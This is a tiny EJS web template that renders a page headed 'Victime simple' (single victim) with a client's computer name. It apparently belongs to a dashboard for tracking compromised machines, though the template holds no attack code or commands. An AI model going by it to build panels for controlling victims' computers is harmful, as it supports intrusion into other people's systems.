<%- include('../partials/header'); %>
    <%- include('../partials/navbar'); %>

    <div class="jumbotron">
        <h1 class="text-center">Victime simple : <%= single_client.computerName %></h1>
    </div>

<%- include('../partials/footer'); %>